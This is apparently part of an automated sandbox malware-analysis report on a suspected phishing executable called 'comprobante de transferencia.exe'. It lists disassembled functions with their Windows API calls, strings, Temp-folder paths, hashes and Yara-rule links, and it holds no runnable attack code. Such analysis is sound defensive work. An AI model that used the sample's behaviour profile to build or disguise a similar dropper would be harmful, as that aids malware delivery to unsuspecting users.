Uniqueness Score: -1.00%

Function 00405D49 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00425D88,NUL), ref: 00405D58
CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,00405EDC,?,?), ref: 00405D7C
GetShortPathNameW.KERNEL32(?,00425D88,00000400), ref: 00405D85

Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96

GetShortPathNameW.KERNEL32(00426588,00426588,00000400), ref: 00405DA2
wsprintfA.USER32 ref: 00405DC0
GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405DFB
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E0A
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E42
SetFilePointer.KERNEL32(00409558,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409558,00000000,[Rename],00000000,00000000,00000000), ref: 00405E98
GlobalFree.KERNEL32(00000000), ref: 00405EA9
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EB0

Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\comprobante de transferencia.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00405BF3
Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00405C15

Strings

%ls=%ls, xrefs: 00405DB6
NUL, xrefs: 00405D52
[Rename], xrefs: 00405E2A, 00405E3C

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 222337774-899692902
Opcode ID: d0bebfde44d1b8ec79e846926d7a4151a37a86d35e5e56b98e3bdf1b29062508
Instruction ID: 320379bf9b7b256e7873fa455d25e0b3442936e7d724c6c18c2d1b17e2228676
Opcode Fuzzy Hash: d0bebfde44d1b8ec79e846926d7a4151a37a86d35e5e56b98e3bdf1b29062508
Instruction Fuzzy Hash: CF31FF31A04B14BFD2216B659C49F6B3A5CDF41759F14043ABA41F62D3EA3CAA008ABD

Uniqueness

Uniqueness Score: -1.00%

Function 004062AE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406311
CharNextW.USER32(?,?,?,00000000), ref: 00406320
CharNextW.USER32(?,00000000,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406325
CharPrevW.USER32(?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406338

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004062AF
"C:\Users\user\Desktop\comprobante de transferencia.exe", xrefs: 004062AE
*?|<>/":, xrefs: 00406300

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\comprobante de transferencia.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-171013888
Opcode ID: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
Instruction ID: 142112f625556876e4cd031ade27854873566ffa35591fc5fadb0a313d070af9
Opcode Fuzzy Hash: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
Instruction Fuzzy Hash: 0711B616C0021299DB307B19DC40AB7A6E8EF99750B56803FED86732C1E77C5C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 00404145 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404162
GetSysColor.USER32(00000000), ref: 0040417E
SetTextColor.GDI32(?,00000000), ref: 0040418A
SetBkMode.GDI32(?,?), ref: 00404196
GetSysColor.USER32(?), ref: 004041A9
SetBkColor.GDI32(?,?), ref: 004041B9
DeleteObject.GDI32(?), ref: 004041D3
CreateBrushIndirect.GDI32(?), ref: 004041DD

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
Instruction ID: 030d9aaba4ad3e93a8394b0be899aa32a9dffcfc2c3f2c4c75d4aa3950b62208
Opcode Fuzzy Hash: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
Instruction Fuzzy Hash: CE21A4B5804704ABC7209F68DD48B4B7BF8AF41710F048A29F995E62E0C734E944CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00404A43 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A5E
GetMessagePos.USER32 ref: 00404A66
ScreenToClient.USER32(?,?), ref: 00404A80
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A92
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AB8

Strings

f, xrefs: 00404A94

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
Instruction ID: 24e0014d109499f5a76e1caf6b4fbcffaf68b7ceae62979d4c0808fe7bebc9aa
Opcode Fuzzy Hash: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
Instruction Fuzzy Hash: A1015271E40219BADB00DB94DD45FFEBBBCAB54711F10012BBB11F62C0D7B4A9018B95

Uniqueness

Uniqueness Score: -1.00%

Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402D22
MulDiv.KERNEL32(000C1D1C,00000064,000C3838), ref: 00402D4D
wsprintfW.USER32 ref: 00402D5D
SetWindowTextW.USER32(?,?), ref: 00402D6D
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F

Strings

verifying installer: %d%%, xrefs: 00402D57

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
Instruction ID: 3cda0e2316cf55cb202c1321fdb8a93457d01500b45ed37e1556afe5f89d55e5
Opcode Fuzzy Hash: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
Instruction Fuzzy Hash: 1D014470500209ABEF249F61DD49FEA3B69EB04344F008035FA05A92D0DBB999548B59

Uniqueness

Uniqueness Score: -1.00%

Function 100022D0 Relevance: 9.1, APIs: 6, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 10002416

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(00000040), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Memory Dump Source

Source File: 00000000.00000002.2927007333.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2926984123.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2927043710.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2927075558.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_comprobante de transferencia.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61

Uniqueness

Uniqueness Score: -1.00%

Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 10002572
GlobalFree.KERNEL32(00000000), ref: 100025AD

Memory Dump Source

Source File: 00000000.00000002.2927007333.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2926984123.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2927043710.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2927075558.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_comprobante de transferencia.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
GlobalFree.KERNEL32(?), ref: 004028E9
GlobalFree.KERNEL32(00000000), ref: 004028FC
CloseHandle.KERNEL32(?), ref: 00402914
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: c4672cc438bfb976ad63f3b88f6fa6a1cd5959f413ccf8879598efff8088fe0d
Instruction ID: c1a5639659a60ac5c9bd0712390274ed5d57598099091cca2b2fb0d84b3ff26b
Opcode Fuzzy Hash: c4672cc438bfb976ad63f3b88f6fa6a1cd5959f413ccf8879598efff8088fe0d
Instruction Fuzzy Hash: 1621AC72C04128BBCF216FA5CD49D9E7E79EF09324F24023AF520762E1C7795D418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404935 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
wsprintfW.USER32 ref: 004049DF
SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2

Strings

&B, xrefs: 004049C8
%u.%u%s%s, xrefs: 004049C0

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$&B
API String ID: 3540041739-2907463167
Opcode ID: 0ddaf8743021833403b6e28cda1e3337aa5d1e434209783b13d21619e8b34570
Instruction ID: 7355c158aba8d6b586dda53eb311f6ba2c540b654501303b209b4c25e60a8b93
Opcode Fuzzy Hash: 0ddaf8743021833403b6e28cda1e3337aa5d1e434209783b13d21619e8b34570
Instruction Fuzzy Hash: 4711D8736041387BEB10A57D9C41E9F368C9B85374F250237FA26F61D2DA79C81282E8

Uniqueness

Uniqueness Score: -1.00%

Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E

Strings

C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp, xrefs: 0040257C
C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll, xrefs: 00402552, 00402575, 00402589, 004025D5

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp$C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll
API String ID: 3109718747-1318223775
Opcode ID: ff5357058379e204ff40c3465f338181e73ead3c1c5b926bf222a7f711fefd23
Instruction ID: 2aea9811a9a124710f812c99978ab25d5578c47fcc6e4ef6251516289d3ba225
Opcode Fuzzy Hash: ff5357058379e204ff40c3465f338181e73ead3c1c5b926bf222a7f711fefd23
Instruction Fuzzy Hash: 73113A32A41214BEDB10AFB18F4AE9E3264AF94385F20403BF402F61C2D6FC8E41562E

Uniqueness

Uniqueness Score: -1.00%

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000000.00000002.2927007333.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2926984123.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2927043710.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2927075558.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_comprobante de transferencia.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: cbab7166b0a94f5ac455d44aeb6c9a0590807e083444e8b07b032d0ff1b104c8
Instruction ID: e9fcbf52d61700e0958b70f2e427462db2dea441f2720d4c42107852d76fa8f5
Opcode Fuzzy Hash: cbab7166b0a94f5ac455d44aeb6c9a0590807e083444e8b07b032d0ff1b104c8
Instruction Fuzzy Hash: F1F0E172A04104AFD701DBE4DE88CEEBBBDEB48311B104466F601F51A1C674ED418B39

Uniqueness

Uniqueness Score: -1.00%

Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040BDB0), ref: 00401DD1

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

